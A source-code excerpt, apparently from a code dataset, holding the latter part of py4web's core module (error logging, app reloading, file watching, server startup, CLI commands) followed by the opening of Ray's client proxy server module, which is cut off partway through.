logging.error("%s error:\n%s" % (app_name, snapshot["traceback"]))
return None
class DatabaseErrorLogger:
def __init__(self):
"""creates the py4web_error table in the service database"""
uri = os.environ["PY4WEB_SERVICE_DB_URI"]
folder = os.environ["PY4WEB_SERVICE_FOLDER"]
self.db = DAL(uri, folder=folder)
self.db.define_table(
"py4web_error",
Field("uuid"),
Field("app_name"),
Field("method"),
Field("path", "string"),
Field("timestamp", "datetime"),
Field("client_ip", "string"),
Field("error", "string"),
Field("snapshot", "json"),
)
self.db.commit()
def log(self, app_name, error_snapshot):
"""store error snapshot (ticket) in the database"""
ticket_uuid = str(uuid.uuid4())
try:
self.db.py4web_error.insert(
uuid=ticket_uuid,
app_name=app_name,
method=request.method,
path=request.path,
timestamp=datetime.datetime.utcnow(),
client_ip=request.environ.get("REMOTE_ADDR"),
error=error_snapshot["exception_value"],
snapshot=error_snapshot,
)
self.db.commit()
return ticket_uuid
except Exception as err:
logging.error(str(err))
self.db.rollback()
return None
def get(self, ticket_uuid=None):
"""retrieve a ticket from error database"""
db = self.db
if ticket_uuid:
query, orderby = db.py4web_error.uuid == ticket_uuid, None
rows = db(query).select(orderby=orderby, limitby=(0, 1)).as_list()
else:
orderby = ~db.py4web_error.timestamp
groupby = db.py4web_error.path | db.py4web_error.error
query = (
db.py4web_error.timestamp
> datetime.datetime.now() - datetime.timedelta(days=7)
)
fields = [field for field in db.py4web_error if not field.type == "json"]
fields.append(db.py4web_error.id.count())
list_rows = (
db(query).select(*fields, orderby=orderby, groupby=groupby).as_list()
)
rows = []
for item in list_rows:
row = item["py4web_error"]
row["count"] = item["_extra"][str(db.py4web_error.id.count())]
rows.append(row)
return rows if not ticket_uuid else rows[0] if rows else None
def clear(self):
"""erase all tickets from database"""
db = self.db
db(db.py4web_error).delete()
self.db.commit()
class ErrorLogger:
"""
To create your own custom logger for an app:
class MyLogger:
def log(app_name, error_snap_shop):
...
return ticket_uuid
error_logger.plugins['app_name'] = MyLogger()
"""
def __init__(self):
self.fallback_logger = SimpleErrorLogger()
self.database_logger = None
self.plugins = {}
def initialize(self):
"""try inizalize database if we have service folder"""
self.database_logger = safely(DatabaseErrorLogger, log=True)
def _get_logger(self, app_name):
"""get the appropriate logger for the app"""
return (
self.plugins.get(app_name) or self.database_logger or self.fallback_logger
)
def log(self, app_name, error_snapshot):
"""log the error snapshot"""
logger = self._get_logger(app_name)
ticket_uuid = safely(lambda: logger.log(app_name, error_snapshot))
if not ticket_uuid:
self.fallback_logger.log(app_name, error_snapshot)
return ticket_uuid
error_logger = ErrorLogger()
#########################################################################################
# Loading & Reloading Logic
#########################################################################################
class Reloader:
ROUTES = []
MODULES = {}
ERRORS = {}
@staticmethod
def install_reloader_hook():
# used by watcher
def hook(*a, **k):
app_name = request.path.split("/")[1]
if not app_name or app_name in _DEFAULT_APP_ROOTS:
app_name = "_default"
if DIRTY_APPS.get(app_name):
Reloader.import_app(app_name)
DIRTY_APPS[app_name] = False
## APP_WATCH tasks, if used by any app
try_app_watch_tasks()
_REQUEST_HOOKS.before.add(hook)
@staticmethod
def clear_routes(app_name=""):
app_root = app_name
if app_root and app_root[0] != "/":
app_root = f"/{app_root}"
routes = f"{app_root}/*"
remove_route = bottle.default_app().router.remove
remove_route(routes)
if app_name:
remove_route(app_root)
if app_name == "_default":
[
(remove_route(f"/{_}"), remove_route(f"/{_}/*"))
for _ in _DEFAULT_APP_ROOTS
]
remove_route("/")
_DEFAULT_APP_ROOTS.clear()
else:
_DEFAULT_APP_ROOTS.clear()
@staticmethod
def import_apps():
"""Import or reimport modules and exposed static files"""
Reloader.clear_routes()
folder = os.environ["PY4WEB_APPS_FOLDER"]
# if first time reload dummy top module
if not Reloader.MODULES:
path = os.path.join(folder, "__init__.py")
loader = importlib.machinery.SourceFileLoader("apps", path)
loader.load_module()
# Then load all the apps as submodules
for app_name in os.listdir(folder):
Reloader.import_app(app_name, clear_before_import=False)
@staticmethod
def import_app(app_name, clear_before_import=True):
if clear_before_import:
Reloader.clear_routes(app_name)
folder = os.environ["PY4WEB_APPS_FOLDER"]
path = os.path.join(folder, app_name)
init = os.path.join(path, "__init__.py")
if os.path.isdir(path) and not path.endswith("__") and os.path.exists(init):
action.app_name = app_name
module_name = "apps.%s" % app_name
def clear_modules():
# all files/submodules
names = [
name
for name in sys.modules
if (name + ".").startswith(module_name + ".")
]
for name in names:
del sys.modules[name]
try:
module = Reloader.MODULES.get(app_name)
if not module:
click.echo("[ ] loading %s ..." % app_name)
else:
click.echo("[ ] reloading %s ..." % app_name)
# forget the module
del Reloader.MODULES[app_name]
clear_modules()
load_module_stdout = io.StringIO()
with redirect_stdout(load_module_stdout):
module = importlib.machinery.SourceFileLoader(
module_name, init
).load_module()
load_module_message = load_module_stdout.getvalue()
if len(load_module_message):
click.secho("\x1b[A stdout %s " % app_name, fg="yellow")
click.echo(load_module_message)
click.secho("\x1b[A[X] loaded %s " % app_name, fg="green")
Reloader.MODULES[app_name] = module
Reloader.ERRORS[app_name] = None
except Exception as err:
Reloader.ERRORS[app_name] = traceback.format_exc()
error_logger.log(app_name, get_error_snapshot())
click.secho(
"\x1b[A[FAILED] loading %s (%s)" % (app_name, err),
fg="red",
)
# clear all files/submodules if the loading fails
clear_modules()
return None
# Expose static files with support for static asset management
static_folder = os.path.join(path, "static")
if os.path.exists(static_folder):
app_name = path.split(os.path.sep)[-1]
if app_name == "_default":
prefix = ""
_DEFAULT_APP_ROOTS.add("static")
else:
prefix = f"/{app_name}"
@bottle.route(prefix + r"/static/<re((_\d+(\.\d+){2}/)?)><fp.path()>")
def server_static(fp, static_folder=static_folder):
filename = fp
response.headers.setdefault("Pragma", "cache")
response.headers.setdefault("Cache-Control", "private")
return bottle.static_file(filename, root=static_folder)
# Register routes list
app = bottle.default_app()
routes = []
for route in app.routes.values():
for method, method_obj in route.methods.items():
func = method_obj.handler
rule = route.rule
# remove optional trailing / from rule
routes.append(
{
"rule": rule,
"method": method,
"filename": module2filename(func.__module__),
"action": func.__name__,
}
)
Reloader.ROUTES = sorted(routes, key=lambda item: item["rule"])
ICECUBE.update(threadsafevariable.ThreadSafeVariable.freeze())
#########################################################################################
# Web Server and Reload Logic: Error Handling
#########################################################################################
ERROR_PAGES = {
"*": (
"<html><head><style>body{color:white;text-align: center;background-color:[[=color]];font-family:serif} "
"h1{font-size:6em;margin:16vh 0 8vh 0} h2{font-size:2em;margin:8vh 0} "
"a{color:white;text-decoration:none;font-weight:bold;padding:10px 10px;border-radius:10px;border:2px solid #fff;transition: all .5s ease} "
"a:hover{background:rgba(0,0,0,0.1);padding:10px 30px}</style></head>"
'<body><h1>[[=code]]</h1><h2>[[=message]]</h2>[[if button_text:]]<a href="[[=href]]">[[=button_text]]</a>[[pass]]</body></html>'
),
}
def error_page(code, button_text=None, href="#", color=None, message=None):
message = http.client.responses[code].upper() if message is None else message
color = (
{"4": "#F44336", "5": "#607D8B"}.get(str(code)[0], "#2196F3")
if not color
else color
)
context = dict(
code=code, message=message, button_text=button_text, href=href, color=color
)
# if client accepts 'application/json' - return json
if re.search(REGEX_APPJSON, request.headers.get("accept", "")):
response.status = code
return json.dumps(context)
# else - return html error-page
content = ERROR_PAGES.get(code) or ERROR_PAGES["*"]
return render(content=content, context=context, delimiters="[[ ]]")
@bottle.error(404)
def error404(error):
guess_app_name = (
"index"
if request.environ.get("HTTP_X_PY4WEB_APPNAME")
else request.path.split("/")[1]
)
if guess_app_name == "index":
href = "/"
else:
href = "/" + guess_app_name
script_name = (
request.environ.get("SCRIPT_NAME", "")
or request.environ.get("HTTP_X_SCRIPT_NAME", "")
).rstrip("/")
if script_name:
href = script_name + href
return error_page(404, button_text=guess_app_name, href=href)
#########################################################################################
# Web Server and Reload Logic: Operations
#########################################################################################
DIRTY_APPS = dict() # apps that need to be reloaded (lazy watching)
APP_WATCH = {"files": dict(), "handlers": OrderedDict(), "tasks": dict()}
""" Decorator that binds a func as an watchdog handler of non-'.py' files.
Paths to files must be relative to app, w/o app name(folder).
@app_watch_handler(['static/sass/all.sass', 'static/sass/main.sass'])
def sass_compile(changed_files):
print(changed_files); # paths of files that changed, for info
sass.compile()
"""
def app_watch_handler(watched_app_subpaths):
stack = inspect.stack
invoker = pathlib.Path(stack()[1].filename)
apps_path = pathlib.Path(os.environ["PY4WEB_APPS_FOLDER"])
app = invoker.relative_to(os.environ["PY4WEB_APPS_FOLDER"]).parts[0]
def decorator(func):
handler = "{}.{}".format(func.__module__, func.__name__)
APP_WATCH["handlers"][handler] = func
for subpath in watched_app_subpaths:
app_path = apps_path.joinpath(app, subpath).as_posix()
if app_path not in APP_WATCH["files"]:
APP_WATCH["files"][app_path] = []
APP_WATCH["files"][app_path].append(handler)
return func
return decorator
def try_app_watch_tasks():
if APP_WATCH["tasks"]:
tried_tasks = []
for handler in APP_WATCH["tasks"]:
changed_files_dict = APP_WATCH["tasks"][handler]
try:
APP_WATCH["handlers"][handler](changed_files_dict.keys())
tried_tasks.append(handler)
except Exception:
logging.error(traceback.format_exc())
## remove executed tasks from register
for handler in tried_tasks:
del APP_WATCH["tasks"][handler]
def watch(apps_folder, server_config, mode="sync"):
def watch_folder_event_loop(apps_folder):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(watch_folder(apps_folder))
async def watch_folder(apps_folder):
click.echo(
"watching (%s-mode) python file changes in: %s" % (mode, apps_folder)
)
async for changes in awatch(os.path.join(apps_folder)):
apps = []
for subpath in [pathlib.Path(pair[1]) for pair in changes]:
name = subpath.relative_to(apps_folder).parts[0]
if subpath.suffix == ".py":
apps.append(name)
## manage `app_watch_handler` decorators
elif subpath.as_posix() in APP_WATCH["files"]:
handlers = APP_WATCH["files"][subpath.as_posix()]
for handler in handlers:
if handler not in APP_WATCH["tasks"]:
APP_WATCH["tasks"][handler] = {}
APP_WATCH["tasks"][handler][subpath.as_posix()] = True
for name in apps:
if mode == "lazy":
DIRTY_APPS[name] = True
else:
Reloader.import_app(name)
## in 'lazy' mode it's done in bottle's 'before_request' hook
if mode != "lazy":
try_app_watch_tasks()
if server_config["number_workers"] > 1:
click.echo("--watch option has no effect in multi-process environment \n")
return
elif server_config["server"].startswith(("wsgiref", "waitress", "rocket")):
# these servers block the main thread so we open a new thread for the file watcher
threading.Thread(
target=watch_folder_event_loop, args=(apps_folder,), daemon=True
).start()
elif server_config["server"] == "tornado":
if server_config["platform"] == "windows" and sys.version_info >= (3, 8):
# see https://bugs.python.org/issue37373 FIX: tornado/py3.8 on window
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
# tornado delegate to asyncio so we add a future into the event loop
asyncio.ensure_future(watch_folder(apps_folder))
elif server_config["server"].startswith("gevent"):
watch_folder_event_loop(apps_folder)
else:
# should never happen
return
if mode == "lazy":
Reloader.install_reloader_hook()
def start_server(kwargs):
host = kwargs["host"]
port = int(kwargs["port"])
apps_folder = kwargs["apps_folder"]
number_workers = kwargs["number_workers"]
params = dict(host=host, port=port, reloader=False)
server_config = dict(
platform=platform.system().lower(),
server=None if kwargs["server"] == "default" else kwargs["server"],
number_workers=number_workers,
)
if not server_config["server"]:
if server_config["platform"] == "windows" or number_workers < 2:
server_config["server"] = "rocket"
else:
if not gunicorn:
logging.error("gunicorn not installed")
return
server_config["server"] = "gunicorn"
# Catch interrupts like Ctrl-C if needed
if server_config["server"] not in {"rocket", "wsgirefWsTwistedServer"}:
signal.signal(
signal.SIGINT,
lambda signal, frame: click.echo(
"KeyboardInterrupt (ID: {}) has been caught. Cleaning up...".format(
signal
)
and sys.exit(0),
),
)
params["server"] = server_config["server"]
if params["server"] in server_adapters.__all__:
params["server"] = getattr(server_adapters, params["server"])()
if number_workers > 1:
params["workers"] = number_workers
if server_config["server"] == "gunicorn":
sys.argv[:] = sys.argv[:1] # else break gunicorn
if kwargs["ssl_cert"] is not None:
params["certfile"] = kwargs["ssl_cert"]
params["keyfile"] = kwargs["ssl_key"]
if server_config["server"] == "gevent":
if not hasattr(_ssl, "sslwrap"):
_ssl.sslwrap = new_sslwrap
if kwargs["watch"] != "off":
watch(apps_folder, server_config, kwargs["watch"])
bottle.run(**params)
def check_compatible(version):
"""To be called by apps to check if module version is compatible with py4web requirements"""
from . import __version__
return tuple(map(int, __version__.split("."))) >= tuple(
map(int, version.split("."))
)
#########################################################################################
# WSGI Adapter
#########################################################################################
class MetaPathRouter:
"""
Instances of this class makes alias for a package name,
in other words instruct the import system to route request
for a package alias, i.e.:
MetaPathRouter("pkg", "pkg_alias")
import pkg_alias.sub
works as
import pkg.sub
author: Paolo Pastori
"""
def __init__(self, pkg, pkg_alias="apps"):
assert pkg_alias
assert pkg
if pkg != pkg_alias:
self.pkg_alias = pkg_alias
self.pkg = pkg
# register as path finder
sys.meta_path.append(self)
def find_spec(self, fullname, path=None, target=None):
if fullname == self.pkg_alias and path is None:
spec = importlib.util.find_spec(self.pkg)
if spec:
spec.name = fullname
spec.loader = importlib.machinery.SourceFileLoader(
fullname, spec.origin
)
return spec
def install_args(kwargs, reinstall_apps=False):
# always convert apps_folder to an absolute path
apps_folder = kwargs["apps_folder"] = os.path.abspath(kwargs["apps_folder"])
kwargs["service_folder"] = os.path.join(
kwargs["apps_folder"], DEFAULTS["PY4WEB_SERVICE_FOLDER"]
)
kwargs["service_db_uri"] = DEFAULTS["PY4WEB_SERVICE_DB_URI"]
for key, val in kwargs.items():
os.environ["PY4WEB_" + key.upper()] = str(val)
Fixture.__fixture_debug__ = kwargs.get("fixture_debug", False)
logging.getLogger().setLevel(
0 if Fixture.__fixture_debug__ else kwargs.get("logging_level", logging.WARNING)
)
yes2 = yes = kwargs.get("yes", False)
# If the apps folder does not exist create it and populate it
if not os.path.exists(apps_folder):
if yes or click.confirm("Create missing folder %s?" % apps_folder):
os.makedirs(apps_folder)
yes2 = True
else:
click.echo("Command aborted")
sys.exit(0)
init_py = os.path.join(apps_folder, "__init__.py")
if not os.path.exists(init_py):
if yes2 or click.confirm("Create missing init file %s?" % init_py):
with open(init_py, "wb"):
pass
else:
click.echo("Command aborted")
sys.exit(0)
# ensure that "import apps.someapp" works
apps_folder_parent, apps_folder_name = os.path.split(apps_folder)
if apps_folder_parent not in sys.path:
sys.path.insert(0, apps_folder_parent)
if apps_folder_name != "apps":
MetaPathRouter(apps_folder_name)
if not os.path.exists(kwargs["service_folder"]):
os.mkdir(kwargs["service_folder"])
session_secret_filename = os.path.join(kwargs["service_folder"], "session.secret")
if not os.path.exists(session_secret_filename):
with open(session_secret_filename, "w") as fp:
fp.write(str(uuid.uuid4()))
with open(session_secret_filename) as fp:
Session.SECRET = fp.read()
# after everything is etup but before installing apps, init
error_logger.initialize()
# Reinstall apps from zipped ones in assets
if reinstall_apps:
assets_dir = os.path.join(os.path.dirname(__file__), "assets")
if os.path.exists(assets_dir):
apps = os.listdir(assets_dir)
for filename in apps:
zip_filename = os.path.join(assets_dir, filename)
# These filenames do not necessarily exist if one has
# downloaded from source and deleted them.
app_name = filename.split(".")[-2]
target_dir = os.path.join(apps_folder, app_name)
if not os.path.exists(target_dir):
if yes or click.confirm("Create app %s?" % app_name):
click.echo("[ ] Unzipping app %s" % filename)
with zipfile.ZipFile(zip_filename, "r") as zip_file:
os.makedirs(target_dir)
zip_file.extractall(target_dir)
click.echo("\x1b[A[X]")
def wsgi(**kwargs):
"""Initializes everything, loads apps, returns the wsgi app"""
install_args(kwargs)
Reloader.import_apps()
return bottle.default_app()
#########################################################################################
# CLI
#########################################################################################
@click.group(
context_settings=dict(help_option_names=["-h", "-help", "--help"]),
help='%s\n\nType "%s COMMAND -h" for available options on commands'
% (__doc__, PY4WEB_CMD),
)
def cli():
pass
@cli.command()
@click.option(
"-a", "--all", is_flag=True, default=False, help="List version of all modules"
)
def version(all):
"""Show versions and exit"""
from . import __version__
click.echo("py4web: %s" % __version__)
if all:
click.echo("system: %s" % platform.platform())
click.echo("python: %s" % sys.version.replace("\n", " "))
for name in sorted(sys.modules):
if hasattr(sys.modules[name], "__version__"):
click.echo("%s: %s" % (name, sys.modules[name].__version__))
@cli.command()
@click.argument("apps_folder")
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
def setup(**kwargs):
"""Setup new apps folder or reinstall it"""
install_args(kwargs, reinstall_apps=True)
@cli.command()
@click.argument("apps_folder", type=click.Path(exists=True))
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
def shell(**kwargs):
"""Open a python shell with apps_folder's parent added to the path"""
install_args(kwargs)
code.interact(local=dict(globals(), **locals()))
@cli.command()
@click.argument("apps_folder", type=click.Path(exists=True))
@click.argument("func")
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
@click.option(
"--args",
default="{}",
help="Arguments passed to the program/function",
show_default=True,
)
def call(apps_folder, func, yes, args):
"""Call a function inside apps_folder"""
kwargs = json.loads(args)
install_args(dict(apps_folder=apps_folder, yes=yes))
apps_folder_name = os.path.basename(os.environ["PY4WEB_APPS_FOLDER"])
app_name = func.split(".")[0]
module, name = ("%s.%s" % (apps_folder_name, func)).rsplit(".", 1)
env = {}
exec("from %s import %s" % (module, name), {}, env)
request.app_name = app_name
env[name](**kwargs)
@cli.command(name="set_password")
@click.option(
"--password",
prompt=True,
confirmation_prompt=True,
hide_input=True,
help="Password value (asked if missing)",
)
@click.option(
"-p",
"--password_file",
default="password.txt",
help="File for the encrypted password",
show_default=True,
)
def set_password(password, password_file):
"""Set administrator's password for the Dashboard"""
click.echo('Storing the hashed password in file "%s"\n' % password_file)
with open(password_file, "w") as fp:
fp.write(str(pydal.validators.CRYPT()(password)[0]))
@cli.command(name="new_app")
@click.argument("apps_folder")
@click.argument("app_name")
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
@click.option(
"-s",
"--scaffold_zip",
default=None,
help="Path to the zip with the scaffolding app",
show_default=False,
)
def new_app(apps_folder, app_name, yes, scaffold_zip):
"""Create a new app copying the scaffolding one"""
install_args(dict(apps_folder=apps_folder, yes=yes))
source = scaffold_zip or os.path.join(
os.path.dirname(__file__), "assets", "py4web.app._scaffold.zip"
)
target_dir = os.path.join(os.environ["PY4WEB_APPS_FOLDER"], app_name)
if not os.path.exists(source):
click.echo("Source app %s does not exists" % source)
sys.exit(1)
elif os.path.exists(target_dir):
click.echo("Target folder %s already exists" % target_dir)
sys.exit(1)
else:
zfile = zipfile.ZipFile(source, "r")
zfile.extractall(target_dir)
zfile.close()
@cli.command()
@click.argument("apps_folder", type=click.Path(exists=True))
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
@click.option("-H", "--host", default="127.0.0.1", help="Host name", show_default=True)
@click.option(
"-P", "--port", default=8000, type=int, help="Port number", show_default=True
)
@click.option(
"-p",
"--password_file",
default="password.txt",
help="File for the encrypted password",
show_default=True,
)
@click.option(
"-s",
"--server",
default="default",
type=click.Choice(
["default", "wsgiref", "tornado", "gunicorn", "gevent", "waitress"]
+ server_adapters.__all__
),
help="server to use",
show_default=True,
)
@click.option(
"-w",
"--number_workers",
default=0,
type=int,
help="Number of workers",
show_default=True,
)
@click.option(
"-d",
"--dashboard_mode",
default="full",
help="Dashboard mode: demo, readonly, full, none",
show_default=True,
)
@click.option(
"--watch",
default="lazy",
type=click.Choice(["off", "sync", "lazy"]),
help="Watch python changes and reload apps automatically, modes: off, sync, lazy",
show_default=True,
)
@click.option(
"--ssl_cert", type=click.Path(exists=True), help="SSL certificate file for HTTPS"
)
@click.option("--ssl_key", type=click.Path(exists=True), help="SSL key file for HTTPS")
@click.option(
"--errorlog",
default=":stderr",
help="Where to send error logs (:stdout|:stderr|tickets_only|{filename})",
show_default=True,
)
@click.option(
"-L",
"--logging_level",
type=int,
default=logging.WARNING,
help="The log level (0 - 50) [default: 30 (=WARNING)]",
)
@click.option(
"-D",
"--debug",
is_flag=True,
default=False,
help="Debug switch",
show_default=True,
)
def run(**kwargs):
"""Run all the applications on apps_folder"""
install_args(kwargs)
from py4web import __version__
click.secho(ART, fg="blue")
click.echo("Py4web: %s on Python %s\n\n" % (__version__, sys.version))
# If we know where the password is stored, read it, otherwise ask for one
if os.path.exists(os.path.join(os.environ["PY4WEB_APPS_FOLDER"], "_dashboard")):
if kwargs["dashboard_mode"] not in ("demo", "none") and not os.path.exists(
kwargs["password_file"]
):
click.echo(
'You have not set a dashboard password. Run "%s set_password" to do so.'
% PY4WEB_CMD
)
else:
click.echo(
"Dashboard is at: http://%s:%s/_dashboard"
% (kwargs["host"], kwargs["port"])
)
# Start
Reloader.import_apps()
start_server(kwargs)
if __name__ == "__main__":
cli()
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import socket
import sys
from threading import Lock, Thread, RLock
import time
import traceback
from typing import Any, Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import (ClientServerHandle,
CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS)
from ray._private.parameter import RayParams
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.utils import detect_fate_sharing_support
# Import psutil after ray so the packaged version is used.
import psutil
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 10
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
def _get_client_id_from_context(context: Any) -> str:
"""
Get `client_id` from gRPC metadata. If the `client_id` is not present,
this function logs an error and sets the status_code.
"""
metadata = {k: v for k, v in context.invocation_metadata()}
client_id = metadata.get("client_id") or ""
if client_id == "":
logger.error("Client connecting with no client_id")
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
return client_id
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to none when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.process_handle_future.done():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
This works by ensuring that the the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
class ProxyManager():
def __init__(self,
redis_address: Optional[str],
*,
session_dir: Optional[str] = None,
redis_password: Optional[str] = None):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self._redis_address = redis_address
self._redis_password = redis_password
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT))
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._node: Optional[ray.node.Node] = None
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
raise RuntimeError("Unable to succeed in selecting a random port.")
@property
def redis_address(self) -> str:
"""
Returns the provided Ray Redis address, or creates a new cluster.
"""
if self._redis_address:
return self._redis_address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self._redis_address = connection_tuple["redis_address"]
self._session_dir = connection_tuple["session_dir"]
return self._redis_address
@property
def node(self) -> ray.node.Node:
"""Gets a 'ray.Node' object for this node (the head node).
If it does not already exist, one is created using the redis_address.
"""
if self._node:
return self._node
ray_params = RayParams(redis_address=self.redis_address)
if self._redis_password:
ray_params.redis_password = self._redis_password
self._node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
return self._node
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
Create, but not start a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert self.servers.get(client_id) is None, (
f"Server already created for Client: {client_id}")
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=grpc.insecure_channel(
f"localhost:{port}", options=GRPC_OPTIONS))
self.servers[client_id] = server
return server
def start_specific_server(self, client_id: str,
job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
serialized_runtime_env = job_config.get_serialized_runtime_env()
output, error = self.node.get_log_file_handles(
f"ray_client_server_{specific_server.port}", unique=True)
proc = start_ray_client_server(
self.redis_address,
specific_server.port,
stdout_file=output,
stderr_file=error,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env=serialized_runtime_env,
session_dir=self.node.get_session_dir_path(),
redis_password=self._redis_password)
# Wait for the process being run transitions from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
else:
psutil_proc = None
# Don't use `psutil` on Win32
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(
f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug(
"Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}")
return proc.process.poll() is None
def _get_server_for_client(self,
client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(
server.channel).result(timeout=CHECK_CHANNEL_TIMEOUT_S)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable,
proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context,
method: str) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
try:
return getattr(stub, method)(
request, metadata=[("client_id", client_id)])
except Exception:
logger.exception(f"Proxying call to {method} failed!")
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def PrepRuntimeEnv(self, request,
context=None) -> ray_client_pb2.PrepRuntimeEnvResponse:
return self._call_inner_function(request, context, "PrepRuntimeEnv")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
return self._call_inner_function(request, context, "KVPut")
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
return self._call_inner_function(request, context, "KVGet")
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
return self._call_inner_function(request, context, "KVGet")
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
return self._call_inner_function(request, context, "KVList")
def KVExists(self, request,
context=None) -> ray_client_pb2.KVExistsResponse:
return self._call_inner_function(request, context, "KVExists")
def ListNamedActors(self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request,
context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(self, request: ray_client_pb2.PutRequest,
